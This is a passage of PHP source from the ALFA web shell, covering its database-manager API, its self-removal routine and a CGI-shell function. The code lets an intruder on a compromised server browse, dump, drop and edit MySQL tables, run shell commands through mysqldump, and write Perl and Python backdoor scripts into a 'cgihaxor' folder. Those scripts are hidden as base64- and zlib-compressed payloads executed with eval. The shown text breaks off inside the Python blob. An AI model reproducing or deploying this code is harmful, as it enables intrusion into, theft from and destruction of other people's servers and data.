  4682. echo '<li><div class="block"><i></i><b></b><a sql_count="'.(empty($_POST['sql_count'])?"false":"true").'" db_target="'.$db_name.'" onclick="alfaMysqlExpander(this);" class="expander cls-'.$db_name.'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/'.($db_name == $_POST['sql_base']?"b_minus.png":"b_plus.png").'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">'.$db_name.'</span><div class="clearfloat"></div><div db_name="'.$db_name.'" mode="'.($db_name == $_POST['sql_base']?"loaded":"no").'" class="list_container cls-'.$db_name.'"><div>';
  4683. if($db_name == $_POST['sql_base']){
  4684. $db->selectdb($_POST['sql_base']);
  4685. $tbls_res = $db->listTables();
  4686. echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-'.$db_name.'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
  4687. while($item = $db->fetch($tbls_res)){
  4688. list($key, $value) = each($item);
  4689. if(!empty($_POST['sql_count']))
  4690. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
  4691. $value = htmlspecialchars($value);
  4692. echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a class='db-opt-id' db_target='".$db_name."' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
  4693. }
  4694. echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-'.$db_name.'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-'.$db_name.'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="'.$db_name.'" target=".cls-'.$db_name.'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
  4695. }
  4696. echo "</div></li>";
  4697. }
  4698. echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='".$_POST['sql_base']."' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
  4699. }
  4700. echo "</table></div>";
  4701. echo "</div>";
  4702. }else{
  4703. echo htmlspecialchars($db->error());
  4704. }
  4705. echo '</div>';
  4706. alfafooter();
  4707. }
  4708. function alfaSql_manager_api(){
  4709. $db = $_POST["alfa1"];
  4710. $type = $_POST["alfa2"];
  4711. $sql_count = $_POST["alfa3"] == "true" ? true : false;
  4712. $db = @json_decode($db, true);
  4713. $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
  4714. @mysqli_set_charset($conn, "utf8");
  4715. if($conn){
  4716. if($type == "load_all_tables"){
  4717. $tables = array();
  4718. $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');");
  4719. $count = 0;
  4720. while($row = @mysqli_fetch_assoc($q_tables)){
  4721. if($sql_count){
  4722. $count_q= @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`');
  4723. if($count_q){
  4724. $count = @mysqli_fetch_row($count_q);
  4725. $count = $count[0];
  4726. }
  4727. }
  4728. $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);
  4729. }
  4730. foreach($db["databases"] as $db){
  4731. if(!isset($tables[$db])){
  4732. $tables[$db] = null;
  4733. }
  4734. }
  4735. echo @json_encode($tables);
  4736. }elseif($type == "dump_drop"){
  4737. if($db["mode"] == "drop"){
  4738. foreach ($db["tables"] as $table) {
  4739. @mysqli_query($conn, "DROP TABLE `".$table."`;");
  4740. }
  4741. $tables = array();
  4742. $q_tables = @mysqli_query($conn, "SHOW TABLES;");
  4743. $count = 0;
  4744. while($row = @mysqli_fetch_array($q_tables)){
  4745. if($sql_count){
  4746. $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
  4747. if($count_q){
  4748. $count = @mysqli_fetch_row($count_q);
  4749. $count = $count[0];
  4750. }
  4751. }
  4752. $tables[] = array("name" => $row[0], "count" => (int)$count);
  4753. }
  4754. echo @json_encode($tables);
  4755. }else{
  4756. if(strlen(alfaEx("mysqldump"))>0){
  4757. alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])." > ".$db["dump_file"]);
  4758. }else{
  4759. $fp = @fopen($db["dump_file"], "w");
  4760. foreach ($db["tables"] as $table) {
  4761. $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');
  4762. $create = @mysqli_fetch_array($res);
  4763. $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n";
  4764. if($fp) fwrite($fp, $sql); else echo($sql);
  4765. $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');
  4766. $head = true;
  4767. while($item = @mysqli_fetch_assoc($tbl_data)){
  4768. $columns = array();
  4769. foreach($item as $k=>$v) {
  4770. if($v == null)
  4771. $item[$k] = "''";
  4772. elseif(is_numeric($v))
  4773. $item[$k] = $v;
  4774. else
  4775. $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'";
  4776. $columns[] = "`".$k."`";
  4777. }
  4778. if($head) {
  4779. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
  4780. $head = false;
  4781. } else
  4782. $sql = "\n\t,(".implode(", ", $item).')';
  4783. if($fp) fwrite($fp, $sql); else echo($sql);
  4784. }
  4785. if(!$head)
  4786. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  4787. }
  4788. }
  4789. echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
  4790. }
  4791. }elseif($type == "load_tables"){
  4792. $tables = array();
  4793. $q_tables = @mysqli_query($conn, "SHOW TABLES;");
  4794. $count = 0;
  4795. while($row = @mysqli_fetch_array($q_tables)){
  4796. if($sql_count){
  4797. $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
  4798. if($count_q){
  4799. $count = @mysqli_fetch_row($count_q);
  4800. $count = $count[0];
  4801. }
  4802. }
  4803. $tables[] = array("name" => $row[0], "count" => (int)$count);
  4804. }
  4805. echo @json_encode($tables);
  4806. }elseif($type == "alter"){
  4807. $db["alter"]["type"] = strtolower($db["alter"]["type"]);
  4808. $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";
  4809. $text_input = array("longtext", "text", "mediumtext", "tinytext");
  4810. if(in_array($db["alter"]["type"], $text_input)){
  4811. $inputs = $db["alter"]["type"];
  4812. }
  4813. @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);
  4814. $error = @mysqli_error($conn);
  4815. if($error){
  4816. echo $error;
  4817. }else{
  4818. echo "ok";
  4819. }
  4820. }elseif($type == "edit" || $type == "delete" || $type == "delete_all"){
  4821. if($type == "edit"){
  4822. $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1");
  4823. $row = @mysqli_fetch_assoc($q);
  4824. if($row){
  4825. $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
  4826. $columns = array();
  4827. $edit_data = array();
  4828. while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
  4829. $input = array("col_type" => $row2["COLUMN_TYPE"]);
  4830. $row2["type"] = strtolower($row2["type"]);
  4831. switch($row2["type"]){
  4832. case "longtext": case "text": case "mediumtext": case "tinytext":
  4833. $input["tag"] = "textarea";
  4834. break;
  4835. case "int": case "smallint": case "bigint": case "tinyint": case "mediumint":
  4836. $input["tag"] = "input";
  4837. $input["type"] = "number";
  4838. break;
  4839. default:
  4840. $input["tag"] = "input";
  4841. $input["type"] = "text";
  4842. }
  4843. $columns[$row2["name"]] = $input;
  4844. }
  4845. foreach($row as $key => $v){
  4846. $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
  4847. }
  4848. echo @json_encode($edit_data);
  4849. }
  4850. }else{
  4851. if($type == "delete_all"){
  4852. $rows = implode("', '", $db["rows"]);
  4853. }else{
  4854. $rows = addslashes($db["key"]);
  4855. }
  4856. $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')";
  4857. @mysqli_query($conn, $query);
  4858. $error = @mysqli_error($conn);
  4859. if($error){
  4860. $status = false;
  4861. }else{
  4862. $status = true;
  4863. }
  4864. echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
  4865. }
  4866. }elseif($type == "update"){
  4867. $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";
  4868. foreach($db["data"] as $col => $val){
  4869. $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',";
  4870. }
  4871. $query = substr($query, 0, -1);
  4872. $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'";
  4873. $res = @mysqli_query($conn, $query);
  4874. echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
  4875. }elseif($type == "insert"){
  4876. $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";
  4877. foreach($db["data"] as $col => $val){
  4878. $cols .= $col . ",";
  4879. $vals .= "'".mysqli_real_escape_string($conn, $val)."',";
  4880. }
  4881. $cols = substr($cols, 0, -1);
  4882. $vals = substr($vals, 0, -1);
  4883. $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
  4884. $res = @mysqli_query($conn, $query);
  4885. echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
  4886. }else{
  4887. $pages = 0;
  4888. $title = false;
  4889. $query = "";
  4890. $tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
  4891. $line = 0;
  4892. $tables = array();
  4893. $columns = array();
  4894. if($type == "load_data"){
  4895. $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";
  4896. $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");
  4897. $tbl_count = @mysqli_fetch_row($tbl_count_q);
  4898. $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
  4899. while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
  4900. $columns[] = $row2;
  4901. }
  4902. if($tbl_count[0] > 30){
  4903. $pages = ceil($tbl_count[0] / 30);
  4904. }
  4905. }elseif($type == "query"){
  4906. $query = $db["query"];
  4907. }elseif($type == "page"){
  4908. $db["page"] = (int)$db["page"] - 1;
  4909. $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";
  4910. }elseif($type == "search"){
  4911. $search = "";
  4912. $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
  4913. foreach($db["search"] as $col => $val){
  4914. $search_noval_r = in_array($val["opt"], $search_noval);
  4915. if(empty($val["value"]) && !$search_noval_r)continue;
  4916. if(strstr($val["opt"], "...") || $search_noval_r){
  4917. $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
  4918. $search .= $col . " " . $val["opt"] . " AND ";
  4919. }else{
  4920. $search .= $col . " ". $val["opt"] . " '".addslashes($val["value"])."' AND ";
  4921. }
  4922. }
  4923. $search .= "1=1";
  4924. $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;
  4925. }
  4926. $q_tables = @mysqli_query($conn, $query);
  4927. if(!$q_tables){
  4928. echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
  4929. return false;
  4930. }
  4931. $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'");
  4932. if($col_key){
  4933. $col_key = @mysqli_fetch_row($col_key);
  4934. $col_key = $col_key[0];
  4935. if(!empty($col_key)){
  4936. $tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="'.$col_key.'" tbl_name="'.$db["table"].'" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
  4937. }
  4938. }else{
  4939. $col_key = false;
  4940. }
  4941. while($item = @mysqli_fetch_assoc($q_tables)){
  4942. if(!$title){
  4943. $tbl_content .= '<tr style="background-color:#305b8e;">';
  4944. if($col_key){
  4945. $tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="'.$db["db_id"].'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
  4946. }
  4947. foreach($item as $key => $value){
  4948. $tbl_content .= '<th>'.$key.'</th>';
  4949. }
  4950. reset($item);
  4951. $title=true;
  4952. $tbl_content .= '</tr><tr>';
  4953. }
  4954. if($col_key){
  4955. $cacheMsg = '<td style="text-align:center;"><input row_id="'.$line.'" type="checkbox" name="tbl_rows_checkbox[]" value="'.$item[$col_key].'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" row_id="'.$line.'" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
  4956. }
  4957. $tbl_content .= '<tr class="tbl_row tbl_row_l'.$line.'">'.$cacheMsg;
  4958. $line++;
  4959. foreach($item as $key => $value){
  4960. if($value == null){
  4961. $tbl_content .= '<td><i>null</i></td>';
  4962. }else{
  4963. $tbl_content .= '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  4964. }
  4965. }
  4966. $tbl_content .= '</tr>';
  4967. }
  4968. $tbl_content .= '</table>';
  4969. if(!$title){
  4970. $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
  4971. }
  4972. echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
  4973. }
  4974. @mysqli_close($conn);
  4975. }
  4976. }
  4977. function alfaselfrm(){
  4978. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
  4979. echo(__pre().'<center>');
  4980. if(@unlink($GLOBALS['__file_path'])){
  4981. echo('<b>Shell has been removed</i> :)</b>');
  4982. }else{
  4983. echo 'unlink error!';
  4984. }
  4985. echo('</center>');
  4986. }
  4987. if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
  4988. echo "<div class=header>";
  4989. echo "
  4990. <center><p><img src=\"https://i.imgur.com/7aRsK2p.png\"></p>";
  4991. echo '<p><div class="txtfont">Do you want to destroy me :( ?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
  4992. echo '</p></center></div>';
  4993. }
  4994. }
  4995. function alfacgishell(){
  4996. alfahead();
  4997. $div = "";
  4998. alfaCreateParentFolder();
  4999. @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  5000. if(!in_array($_POST['alfa1'],array('perl','py'))){
  5001. $div = "</div>";
  5002. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\'perl\')">| Perl | </a><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\'py\');">| Python | </a>';
  5003. }
  5004. if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
  5005. @mkdir('cgihaxor',0755);
  5006. @chdir('cgihaxor');
  5007. alfacgihtaccess('cgi');
  5008. $name = $_POST['alfa1'].'.haxor';
  5009. $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
  5010. $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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